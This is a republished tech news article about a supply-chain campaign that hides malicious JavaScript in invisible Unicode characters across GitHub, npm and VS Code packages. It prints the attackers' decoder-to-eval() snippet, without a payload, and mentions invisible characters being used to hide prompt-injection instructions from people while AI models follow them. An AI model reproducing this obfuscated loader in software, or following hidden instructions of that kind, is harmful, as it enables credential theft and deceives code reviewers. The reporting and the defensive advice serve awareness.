Close Menu
GeekBlog

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Meta is secretly working on an AI detection tool after unleashing AI slop avalanche

    March 16, 2026

    This Alien Planet Might Be the Stinkiest Place in the Galaxy

    March 16, 2026

    Amazon is clearing out these popular DeWalt power tools by up to $190 off

    March 16, 2026
    Facebook X (Twitter) Instagram Threads
    GeekBlog
    • Home
    • Mobile
    • Tech News
    • Blog
    • How-To Guides
    • AI & Software
    Facebook
    GeekBlog
    Home»Tech News»Supply-chain attack using invisible code hits GitHub and other repositories
    Tech News

    Supply-chain attack using invisible code hits GitHub and other repositories

    Michael ComaousBy Michael ComaousMarch 16, 20263 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
    Supply-chain attack using invisible code hits GitHub and other repositories
    Share
    Facebook Twitter LinkedIn Pinterest Email Copy Link

    The invisible code is rendered with Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

    The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden.

    Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.

    const s = v => [...v].map(w => (
      w = w.codePointAt(0),
      w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
      w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
    )).filter(n => n !== null);
    
    
    eval(Buffer.from(s(``)).toString('utf-8'));

    “The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”

    Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

    The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible unicode characters are encoding malicious payloads.

    Source: arstechnica.com

    attack code GitHub hits Invisible repositories supplychain
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Telegram Email Copy Link
    Previous ArticleGoogle, Accel India accelerator choses 5 startups and none are ‘AI wrappers’
    Next Article iGarden M1 Pro Max 100 Review: A Sports Car for Your Pool
    Michael Comaous
    • Website

    Michael Comaous is a dedicated professional with a passion for technology, innovation, and creative problem-solving. Over the years, he has built experience across multiple industries, combining strategic thinking with hands-on expertise to deliver meaningful results. Michael is known for his curiosity, attention to detail, and ability to explain complex topics in a clear and approachable way. Whether he’s working on new projects, writing, or collaborating with others, he brings energy and a forward-thinking mindset to everything he does.

    Related Posts

    2 Mins Read

    Meta is secretly working on an AI detection tool after unleashing AI slop avalanche

    4 Mins Read

    This Alien Planet Might Be the Stinkiest Place in the Galaxy

    1 Min Read

    Amazon is clearing out these popular DeWalt power tools by up to $190 off

    1 Min Read

    WIRED Article Production automation page/Only for QA/Do not click/Do not publish

    2 Mins Read

    Apple’s AirPods Max 2 bring H2 chip, boosted ANC in April for $549

    3 Mins Read

    Antonio Gracias says he’s longing for ‘proentropic’ startups — those that are built to survive chaos

    Top Posts

    Discord will require a face scan or ID for full access next month

    February 9, 2026762 Views

    The Mesh Router Placement Strategy That Finally Gave Me Full Home Coverage

    August 4, 2025624 Views

    Trade in your old phone and get up to $1,100 off a new iPhone 17 at AT&T – here’s how

    September 10, 2025311 Views
    Stay In Touch
    • Facebook

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Most Popular

    Discord will require a face scan or ID for full access next month

    February 9, 2026762 Views

    The Mesh Router Placement Strategy That Finally Gave Me Full Home Coverage

    August 4, 2025624 Views

    Trade in your old phone and get up to $1,100 off a new iPhone 17 at AT&T – here’s how

    September 10, 2025311 Views
    Our Picks

    Meta is secretly working on an AI detection tool after unleashing AI slop avalanche

    March 16, 2026

    This Alien Planet Might Be the Stinkiest Place in the Galaxy

    March 16, 2026

    Amazon is clearing out these popular DeWalt power tools by up to $190 off

    March 16, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook
    • About Us
    • Contact us
    • Privacy Policy
    • Disclaimer
    • Terms and Conditions
    © 2026 GeekBlog

    Type above and press Enter to search. Press Esc to cancel.

    Ad Blocker Enabled!
    Ad Blocker Enabled!
    Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.